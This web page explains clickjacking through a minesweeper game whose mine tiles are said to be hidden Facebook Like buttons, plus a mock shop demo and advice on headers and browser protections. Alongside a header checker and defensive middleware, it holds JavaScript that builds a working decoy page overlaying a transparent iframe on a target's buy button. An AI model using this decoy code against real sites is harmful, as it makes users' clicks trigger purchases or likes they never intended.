🚩🚩🚩 Social Minefield 🚩🚩🚩

A high-stakes game of minesweeper.

Rules:

Click a tile to start!

How does it work?

The game works by exploiting a web vulnerability called Clickjacking (also known as UI redressing). A malicious page embeds another website in an invisible frame and lines it up under something the visitor wants to click, so the click lands on the embedded site and performs an action on behalf of the user, without their consent.

In this game, the tiles where the mines would be are actually hidden Facebook Like buttons embedded in the page. Click one and your Facebook account likes whatever link the button points at. For example:

A partially completed game of Social Minefield, but with the Facebook Like buttons visible.

As you can see, the suspiciously shaped tiles of this minesweeper game hide a secret. Let's take a closer look into the world of Clickjacking attacks.

The Clickjacking attack

In the security world, Clickjacking is a forgotten cousin of higher-profile bugs such as SQL Injection or Cross-Site Scripting (XSS). But if a site is vulnerable to it, the consequences for its users can still be serious: any action a single click can trigger on that site (buying, liking, changing a setting) can be triggered by an attacker while the user is logged in.

Here's a fictional, interactive demonstration of how Clickjacking attacks work:

[Interactive demo: a mock ShopFast product page at https://shopfast.com.au/shonky-hammer, shown with a padlock icon for a secure connection, the ShopFast logo and "Logged in as Gareth". It lists a Shonky Hammer sold by Shonky Steve PTY LTD for $100.00, with 100 reviews averaging 2 stars, and a '1-click buy' button.]

Welcome to ShopFast!

Australia's leading eCommerce website.

This fictional site lets you purchase goods from sellers across the world with just one click.

Pressing the '1-click buy' button will immediately debit the money from your account and send the purchased item to your address. That is exactly what makes it a Clickjacking target: one click, with no confirmation step, performs a sensitive action while you're logged in.

Try clicking it! To make it easier to understand how the demo works, we'll make a pop-up appear when you click it.
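To make the attacker's side of the demo concrete, here is an added example (not code from the Social Minefield page) that builds the decoy page an attacker would host. The victim site is loaded into a fully transparent iframe that is shifted so its '1-click buy' button sits exactly under a harmless-looking button the visitor wants to press. The target URL, the button's position inside the framed page, and the page dimensions are assumptions made for the example.

```javascript
// Added example, not the page's own code: the attacker's decoy page for the
// ShopFast demo. All coordinates and the target URL are assumptions.

// Where the real "1-click buy" button sits inside the framed ShopFast page
// (assumed, in CSS pixels). An attacker measures this once in their own browser.
const SHOPFAST_BUY_BUTTON = { x: 640, y: 410, width: 140, height: 40 };

// Offset to apply to the iframe so that the target button lands exactly on the
// decoy button drawn at (decoyX, decoyY) in the attacker's page.
function iframeOffset(targetButton, decoyX, decoyY) {
  return { left: decoyX - targetButton.x, top: decoyY - targetButton.y };
}

// Minimal HTML escaping for the values interpolated into the page.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Build the decoy page. The iframe is transparent (opacity:0) and stacked
// above the decoy (higher z-index), so the browser routes the click to the
// framed site rather than to the button the visitor can see.
function buildClickjackPage({ targetUrl, targetButton, decoyX, decoyY, decoyLabel }) {
  const { left, top } = iframeOffset(targetButton, decoyX, decoyY);
  return [
    '<!doctype html>',
    '<html><head><meta charset="utf-8"><title>Claim your prize</title>',
    '<style>',
    `  .decoy  { position:absolute; left:${decoyX}px; top:${decoyY}px;`,
    `            width:${targetButton.width}px; height:${targetButton.height}px; z-index:1; }`,
    `  .victim { position:absolute; left:${left}px; top:${top}px; width:1280px; height:960px;`,
    '            border:0; opacity:0; z-index:2; }',
    '</style></head><body>',
    `  <button class="decoy">${escapeHtml(decoyLabel)}</button>`,
    `  <iframe class="victim" src="${escapeHtml(targetUrl)}"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Usage: write the string to attacker.html and open it in a browser that is
// logged in to the (fictional) shop. Pressing "Claim prize" presses the
// framed "1-click buy" button instead, with the victim's own cookies attached.
const attackerPage = buildClickjackPage({
  targetUrl: 'https://shopfast.com.au/shonky-hammer',
  targetButton: SHOPFAST_BUY_BUTTON,
  decoyX: 100,
  decoyY: 80,
  decoyLabel: 'Claim prize',
});
```

Social Minefield does the same thing many times over: every "mine" is one small frame of the Like button placed under a tile, instead of one big frame under a single decoy. Nothing in the attacker's page needs to read the framed content, which is why the same-origin policy does not help here; only the framed site can refuse to be framed.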

How do I know if a site is vulnerable?

I've written a tool to easily check whether a site is vulnerable to Clickjacking. A site is vulnerable when whoever runs it has not configured it to send the response headers that tell browsers to reject attempts to embed it in other websites.


The fields the tool reports are those headers: X-Frame-Options, and the frame-ancestors directive of Content-Security-Policy. Their values specify whether another website is allowed to embed this one. If it's not allowed, your web browser (Chrome, Firefox, Safari, etc.) will refuse to render the embedded page, thwarting the attack. Note that the headers are sent per response, so one page of a site can be protected while another page on the same site is not.

As an example, here's what it looks like when your browser attempts to load a website that isn't allowed to be embedded (in this case, Google).

Some sites intentionally allow being embedded in other sites, such as the Facebook "Like" button. It lets websites (such as news sites) give their users a way to "like" a page, making sure the article gets more attention. Because the button must work when framed by any site, the page that serves it cannot carry the protection above, and that is exactly what this game abuses. Facebook also uses the Like button to discreetly track users across the web. It's embedded across 7.5 million websites - that's quite a spy network!
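The check the tool above performs can be written down as a small function. This is an added example, not the page's own tool: it takes a site's URL, its response headers and the would-be embedder's URL, and decides whether a browser would render the frame. It is a simplified model of the browser's behaviour (a frame-ancestors directive takes precedence over X-Frame-Options; ALLOW-FROM and unrecognised values are ignored by modern browsers and so count as no protection; only one ancestor is checked rather than the whole frame chain). The header sets in the usage and tests are constructed, not captured from any real site; an endpoint that must be embeddable everywhere, like the Like button, would look like the "no header" or "frame-ancestors *" case.

```javascript
// Added example, not the page's own tool: would a browser let `embedderUrl`
// frame the page at `siteUrl`, given the response headers it was served with?
// Simplified model of the browser check; see the caveats in the text above.

// Pull the frame-ancestors source list out of a Content-Security-Policy value.
// Returns null when the policy carries no frame-ancestors directive at all.
function frameAncestorsSources(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

// Does one CSP source expression match the ancestor (embedder) origin?
function sourceMatches(src, ancestor, site) {
  const s = src.replace(/^'|'$/g, '');
  if (s === '*') return true;
  if (s === 'none') return false;
  if (s === 'self') return ancestor.origin === site.origin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(s)) return ancestor.protocol === s.toLowerCase(); // scheme-source, e.g. https:
  // host-source: optional scheme, optional leading wildcard label, optional port
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/i);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && `${scheme.toLowerCase()}:` !== ancestor.protocol) return false;
  const h = ancestor.hostname;
  if (wildcard ? !h.endsWith('.' + host.toLowerCase()) : h !== host.toLowerCase()) return false;
  const ancestorPort = ancestor.port || (ancestor.protocol === 'https:' ? '443' : '80');
  if (port && port !== '*' && port !== ancestorPort) return false;
  return true;
}

// true  -> the embed would render (site is frameable by that embedder)
// false -> the browser would refuse to render the frame
function canBeFramed(siteUrl, headers, embedderUrl) {
  const site = new URL(siteUrl);
  const embedder = new URL(embedderUrl);
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));

  // CSP frame-ancestors, when present, wins and X-Frame-Options is ignored.
  const sources = frameAncestorsSources(h['content-security-policy']);
  if (sources !== null) return sources.some((src) => sourceMatches(src, embedder, site));

  // Otherwise fall back to X-Frame-Options.
  const xfo = (h['x-frame-options'] || '').split(',').map((v) => v.trim().toLowerCase());
  if (xfo.includes('deny')) return false;
  if (xfo.includes('sameorigin')) return embedder.origin === site.origin;
  return true; // header absent, ALLOW-FROM, or garbage: nothing stops the embed
}

// Usage with constructed headers (not captured from a real site):
const unprotected = canBeFramed('https://shopfast.com.au/shonky-hammer', {}, 'https://evil.example');
const protectedSite = canBeFramed('https://shopfast.com.au/shonky-hammer',
  { 'X-Frame-Options': 'SAMEORIGIN' }, 'https://evil.example');
```

To turn this into the tool above, fetch the target URL (following redirects, since the final response is the one that matters), pass its headers in, and report both headers alongside the verdict. Anything that returns true for an arbitrary third-party embedder is a Clickjacking candidate.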

I'm a developer, how do I fix my site?

I've written a guide here.

How to eradicate this vulnerability?

The crux of the problem is that embedding is allowed by default: a page that sends neither header can be framed by anyone. If browsers instead disallowed framing by default and only permitted same-origin embeds (i.e. a site can embed itself), this problem wouldn't occur nearly as often.

That's it. Change the default behaviour so that allowing cross-site embeds is opt-in. Whilst this would break some existing sites, it would take one line of configuration (a frame-ancestors directive naming the origins that may embed the page) to allow it where it's needed.

If a site can't be updated (perhaps it's fallen out of maintenance), a browser extension could override the default and re-enable embedding for that site.

There are a lot of websites out there that are not created by elite teams of developers with a security team behind them to catch these problems. Many are made by junior developers, or farmed out to the lowest bidder. It is generally a Good Idea to defend against ignorance with secure defaults.
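Until browsers change their default, a site can adopt the opt-in policy itself. The following is an added example (it is not the guide linked above and not the page's own code) of an "embedding is denied unless a route opts in" rule for a Node.js-style server: every response gets frame-ancestors 'self' plus X-Frame-Options: SAMEORIGIN, and only routes on an explicit allowlist name the origins that may embed them. The route paths and partner origins are assumptions for the example.

```javascript
// Added example, not the page's own code: anti-framing headers that default to
// "deny unless same-origin", with per-route opt-in. Paths and origins are assumed.

// Routes that legitimately need to be embedded, and who may embed them.
const EMBED_ALLOWLIST = {
  '/widgets/like-button': ['https://news.example', 'https://*.partner.example'],
};

// Headers for a given request path. The default case sends both headers so
// browsers without CSP support are covered as well; the opt-in case sends
// only CSP, because X-Frame-Options cannot express an allowlist (ALLOW-FROM
// is no longer honoured) and CSP-aware browsers ignore it when
// frame-ancestors is present.
function framingHeaders(path) {
  const allowed = EMBED_ALLOWLIST[path];
  if (!allowed) {
    return {
      'Content-Security-Policy': "frame-ancestors 'self'",
      'X-Frame-Options': 'SAMEORIGIN',
    };
  }
  return { 'Content-Security-Policy': `frame-ancestors 'self' ${allowed.join(' ')}` };
}

// Request hook: works with Node's http.ServerResponse or anything with
// setHeader(name, value). Returns the headers it set, for inspection.
function attachFramingHeaders(req, res) {
  const path = new URL(req.url, 'http://localhost').pathname;
  const headers = framingHeaders(path);
  for (const [name, value] of Object.entries(headers)) res.setHeader(name, value);
  return headers;
}
```

Wire it in as the first thing every handler does, e.g. `http.createServer((req, res) => { attachFramingHeaders(req, res); /* ...render... */ })`, or as middleware in whatever framework you use. Because the allowlist is keyed by path, adding a new embeddable widget is a deliberate one-line change rather than the silent default.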

How do I protect myself?

Unfortunately, it's up to each website's creators to fix their site so that its users aren't vulnerable to Clickjacking attacks against it; there is nothing a visitor can configure that makes an unprotected site safe.

However, for this specific attack against Facebook likes, you can install software with built-in protections against trackers and ads. These block the Like button's frame from loading in the first place, which thwarts this method.

I personally recommend:

  • Firefox or Safari (iOS/Mac) browsers.
    • These both have great built-in protections for both safety and privacy.
    • Unfortunately Google Chrome does not (and probably won't ever) have built-in protection from trackers, as Google's business is built around tracking user information and selling ads.
  • Privacy Badger - A browser extension that intelligently blocks trackers.
    • For Google Chrome: here
    • For Firefox: here
    • For Edge: here
    • Safari is not supported. 😞
  • uBlock Origin - The best ad blocker in existence.
    • For Google Chrome: here
    • For Firefox: here
    • For Edge: here
    • Safari is not supported. 😞 However, I've heard good things about 1Blocker.

Acknowledgements

Some resources were used in the supporting material.
  • Squiggly arrow from Wannapik
  • Shopfast logo, broken hammer, cool car images by Dall-E 3.
  • Under construction logo from textfiles.
  • Cool text generator from cooltext.com.
  • Favicon generated from Twemoji.

If you're curious, the code for all this is free and open-source on GitHub, here. Or, just view source on this page. 🙃